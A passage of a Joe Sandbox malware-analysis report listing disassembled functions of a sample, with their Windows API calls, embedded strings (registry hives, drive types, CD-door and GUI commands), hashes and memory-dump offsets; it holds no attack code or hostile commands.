                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                              • API String ID: 9721498-966354055
                                                                                                                                                                              • Opcode ID: 9eb5d4eb3306829aee86fe8b778725a55609936fdba44c4af9e8c50518e3439b
                                                                                                                                                                              • Instruction ID: 0bde701769eb45d5d8a437870e61f18ed07fafe19f7f1fc4b254fbdabab8b8e3
                                                                                                                                                                              • Opcode Fuzzy Hash: 9eb5d4eb3306829aee86fe8b778725a55609936fdba44c4af9e8c50518e3439b
                                                                                                                                                                              • Instruction Fuzzy Hash: C6125875608211DFD714DF14D881B2AB7E5EF89714F14885CF98AAB3A2CB31ED41CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00E31462
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E3149D
                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E314F0
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E31526
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E315A2
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E3161D
                                                                                                                                                                                • Part of subcall function 00DBFD52: _wcslen.LIBCMT ref: 00DBFD5D
                                                                                                                                                                                • Part of subcall function 00E03535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E03547
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                              • API String ID: 1103490817-4258414348
                                                                                                                                                                              • Opcode ID: 66dc85f2059251382fb9bffbe80100b8764858c0facfd52c93b173e961ce455e
                                                                                                                                                                              • Instruction ID: 0fbeccfb8e6b43264c829461d65a927fcf83e434a6dc4bf231ac69ca9265e411
                                                                                                                                                                              • Opcode Fuzzy Hash: 66dc85f2059251382fb9bffbe80100b8764858c0facfd52c93b173e961ce455e
                                                                                                                                                                              • Instruction Fuzzy Hash: ABE1BD716083018FCB14DF24C55186ABBE2FF98354F14999DF896AB3A2CB31ED45CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                              • API String ID: 1256254125-909552448
                                                                                                                                                                              • Opcode ID: f468180780eb9ece7e6c17669263aebdc3d21172e90e880c0568ff4d6ccedf0c
                                                                                                                                                                              • Instruction ID: 9f73de54b61fe11e40b7d8f02eec83596d93dbcb562dbf9e7c2705e5e0f35bea
                                                                                                                                                                              • Opcode Fuzzy Hash: f468180780eb9ece7e6c17669263aebdc3d21172e90e880c0568ff4d6ccedf0c
                                                                                                                                                                              • Instruction Fuzzy Hash: 48710A3264813ACBCB109F7CEE115FA3391EF6035CB212125F966F7294EA75DD4483A0
                                                                                                                                                                              APIs
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E38DB5
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E38DC9
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E38DEC
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E38E0F
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E38E4D
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E36691), ref: 00E38EA9
                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E38EE2
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E38F25
                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E38F5C
                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00E38F68
                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E38F78
                                                                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,00E36691), ref: 00E38F87
                                                                                                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E38FA4
                                                                                                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E38FB0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                              • String ID: .dll$.exe$.icl
                                                                                                                                                                              • API String ID: 799131459-1154884017
                                                                                                                                                                              • Opcode ID: 35d2cfa8ff8a6e5be833d223b7ff0c07c3a61868d788af0d0b8cb3cc885e79a7
                                                                                                                                                                              • Instruction ID: 6b9d3f7967b90534e7d7f6f02beb86874ca0bcdd8d91c9ea47834297a1c6ecc5
                                                                                                                                                                              • Opcode Fuzzy Hash: 35d2cfa8ff8a6e5be833d223b7ff0c07c3a61868d788af0d0b8cb3cc885e79a7
                                                                                                                                                                              • Instruction Fuzzy Hash: 2161E071A00319BEEB149F65DD49FBE7BA8EF08B14F10450AF815E60D1DBB59A90CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00E1493D
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E14948
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E1499F
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E149DD
                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 00E14A1B
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E14A63
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E14A9E
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E14ACC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                              • API String ID: 1839972693-4113822522
                                                                                                                                                                              • Opcode ID: 8d8b48af2d3eb0fa5debeb49a424e2585afa28dbd4b5f9595bbfbe61b3940352
                                                                                                                                                                              • Instruction ID: a503f349297d57645c26490fdac5f8377f2373130c7ec7ee63804163deb47d59
                                                                                                                                                                              • Opcode Fuzzy Hash: 8d8b48af2d3eb0fa5debeb49a424e2585afa28dbd4b5f9595bbfbe61b3940352
                                                                                                                                                                              • Instruction Fuzzy Hash: 0E71D6B25083029FC710EF24D8419ABB7E4EF99758F00592DF895A7391EB31DD85CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 00E06395
                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E063A7
                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00E063BE
                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00E063D3
                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00E063D9
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00E063E9
                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00E063EF
                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E06410
                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E0642A
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00E06433
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0649A
                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00E064D6
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00E064DC
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00E064E3
                                                                                                                                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E0653A
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00E06547
                                                                                                                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00E0656C
                                                                                                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E06596
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 895679908-0
                                                                                                                                                                              • Opcode ID: 11a7b18ca6f4b2f68f3f907947b635f48771e39b29269a179a585c18b25d2276
                                                                                                                                                                              • Instruction ID: 0ad4cd4201700fa846177ca35bcbbc702f95822184358a43f1f7db1aff244f9f
                                                                                                                                                                              • Opcode Fuzzy Hash: 11a7b18ca6f4b2f68f3f907947b635f48771e39b29269a179a585c18b25d2276
                                                                                                                                                                              • Instruction Fuzzy Hash: A671AF31900709AFDB20DFA9DE4ABAEBBF5FF48704F101918E196B25A0C775E994CB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00E20884
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00E2088F
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00E2089A
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00E208A5
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00E208B0
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00E208BB
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00E208C6
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00E208D1
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00E208DC
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00E208E7
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00E208F2
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00E208FD
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00E20908
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00E20913
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00E2091E
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00E20929
                                                                                                                                                                              • GetCursorInfo.USER32(?), ref: 00E20939
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00E2097B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3215588206-0
                                                                                                                                                                              • Opcode ID: 8a54610d5b8355369cc4ca8b545bab9c8aece934a135965fd4f13b250e9a0f28
                                                                                                                                                                              • Instruction ID: eb11cb8a37b4a3c55cd3e1b911cd91ba6980f3e212eebdf2abb3b95b48fb394f
                                                                                                                                                                              • Opcode Fuzzy Hash: 8a54610d5b8355369cc4ca8b545bab9c8aece934a135965fd4f13b250e9a0f28
                                                                                                                                                                              • Instruction Fuzzy Hash: E34184B0D083196EDB109FB69C8985EBFA8FF44354B50452AA11DE7281D6749800CFA1
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k
                                                                                                                                                                              • API String ID: 176396367-2171760788
                                                                                                                                                                              • Opcode ID: ded9e5f09f1b5d0837ae17f50c1a5f67891b2dbdc3cd5c26403d4dc0445a725c
                                                                                                                                                                              • Instruction ID: efbbf759b4e241d3af89171ddaa9160b617be9a04daf5c457f44461dd20c9a42
                                                                                                                                                                              • Opcode Fuzzy Hash: ded9e5f09f1b5d0837ae17f50c1a5f67891b2dbdc3cd5c26403d4dc0445a725c
                                                                                                                                                                              • Instruction Fuzzy Hash: 78E1C032A00616ABCB149F74C8817EDFBB8FF54754F14621AE456F7290DB30AEC597A0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 00E39BA3
                                                                                                                                                                                • Part of subcall function 00E380AE: ClientToScreen.USER32(?,?), ref: 00E380D4
                                                                                                                                                                                • Part of subcall function 00E380AE: GetWindowRect.USER32(?,?), ref: 00E3814A
                                                                                                                                                                                • Part of subcall function 00E380AE: PtInRect.USER32(?,?,?), ref: 00E3815A
                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00E39C0C
                                                                                                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E39C17
                                                                                                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E39C3A
                                                                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E39C81
                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00E39C9A
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00E39CB1
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00E39CD3
                                                                                                                                                                              • DragFinish.SHELL32(?), ref: 00E39CDA
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00E39DCD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$($(
                                                                                                                                                                              • API String ID: 221274066-1080139498
                                                                                                                                                                              • Opcode ID: df602ff5799d7e186610d01323906b3b5ce1c0957f268a127d32b98c915a9737
                                                                                                                                                                              • Instruction ID: 93f2902703c5b18f962a17400c96d0a9f1ba16b61ad8db01b258c37bc1b5b972
                                                                                                                                                                              • Opcode Fuzzy Hash: df602ff5799d7e186610d01323906b3b5ce1c0957f268a127d32b98c915a9737
                                                                                                                                                                              • Instruction Fuzzy Hash: 78615971108305AFC701EF61DC89D9BBFE8EFC9750F40091EF595A21A1DB719A49CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00DC0436
                                                                                                                                                                                • Part of subcall function 00DC045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00E7170C,00000FA0,FA48386E,?,?,?,?,00DE2733,000000FF), ref: 00DC048C
                                                                                                                                                                                • Part of subcall function 00DC045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00DE2733,000000FF), ref: 00DC0497
                                                                                                                                                                                • Part of subcall function 00DC045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00DE2733,000000FF), ref: 00DC04A8
                                                                                                                                                                                • Part of subcall function 00DC045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00DC04BE
                                                                                                                                                                                • Part of subcall function 00DC045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00DC04CC
                                                                                                                                                                                • Part of subcall function 00DC045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00DC04DA
                                                                                                                                                                                • Part of subcall function 00DC045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DC0505
                                                                                                                                                                                • Part of subcall function 00DC045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DC0510
                                                                                                                                                                              • ___scrt_fastfail.LIBCMT ref: 00DC0457
                                                                                                                                                                                • Part of subcall function 00DC0413: __onexit.LIBCMT ref: 00DC0419
                                                                                                                                                                              Strings
                                                                                                                                                                              • WakeAllConditionVariable, xrefs: 00DC04D2
                                                                                                                                                                              • SleepConditionVariableCS, xrefs: 00DC04C4
                                                                                                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00DC0492
                                                                                                                                                                              • kernel32.dll, xrefs: 00DC04A3
                                                                                                                                                                              • InitializeConditionVariable, xrefs: 00DC04B8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                              • API String ID: 66158676-1714406822
                                                                                                                                                                              • Opcode ID: b0ba69cd429c56b9db992233b688c3ff7a15cadad9e5fc19f230f65f1448c96b
                                                                                                                                                                              • Instruction ID: 0084bdada052975dafa85b350506966c17fd46384a03ebdf3baf0e4635efa03a
                                                                                                                                                                              • Opcode Fuzzy Hash: b0ba69cd429c56b9db992233b688c3ff7a15cadad9e5fc19f230f65f1448c96b
                                                                                                                                                                              • Instruction Fuzzy Hash: 89210B32A4971AEFD7146BA5BC0AF6A7FA4DB05F61F04012DF905F7280DBB09C048A71
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharLowerBuffW.USER32(00000000,00000000,00E3DCD0), ref: 00E14F6C
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E14F80
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E14FDE
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E15039
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E15084
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E150EC
                                                                                                                                                                                • Part of subcall function 00DBFD52: _wcslen.LIBCMT ref: 00DBFD5D
                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,00E67C10,00000061), ref: 00E15188
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                              • API String ID: 2055661098-1000479233
                                                                                                                                                                              • Opcode ID: 058a8b1bfdd20517a097e2380e491c9cb96b148e0eb4e5ac8cbe18919b942b7d
                                                                                                                                                                              • Instruction ID: 861b703195d4c8af2d61a637064bd3be90a29f41b045dbe516c022c9b94ae67f
                                                                                                                                                                              • Opcode Fuzzy Hash: 058a8b1bfdd20517a097e2380e491c9cb96b148e0eb4e5ac8cbe18919b942b7d
                                                                                                                                                                              • Instruction Fuzzy Hash: 97B10532608702DFC310DF28C890AAAB7E5FFD9768F50591DF496A3291D770D885CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2BBF8
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E2BC10
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E2BC34
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2BC60
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E2BC74
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E2BC96
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2BD92
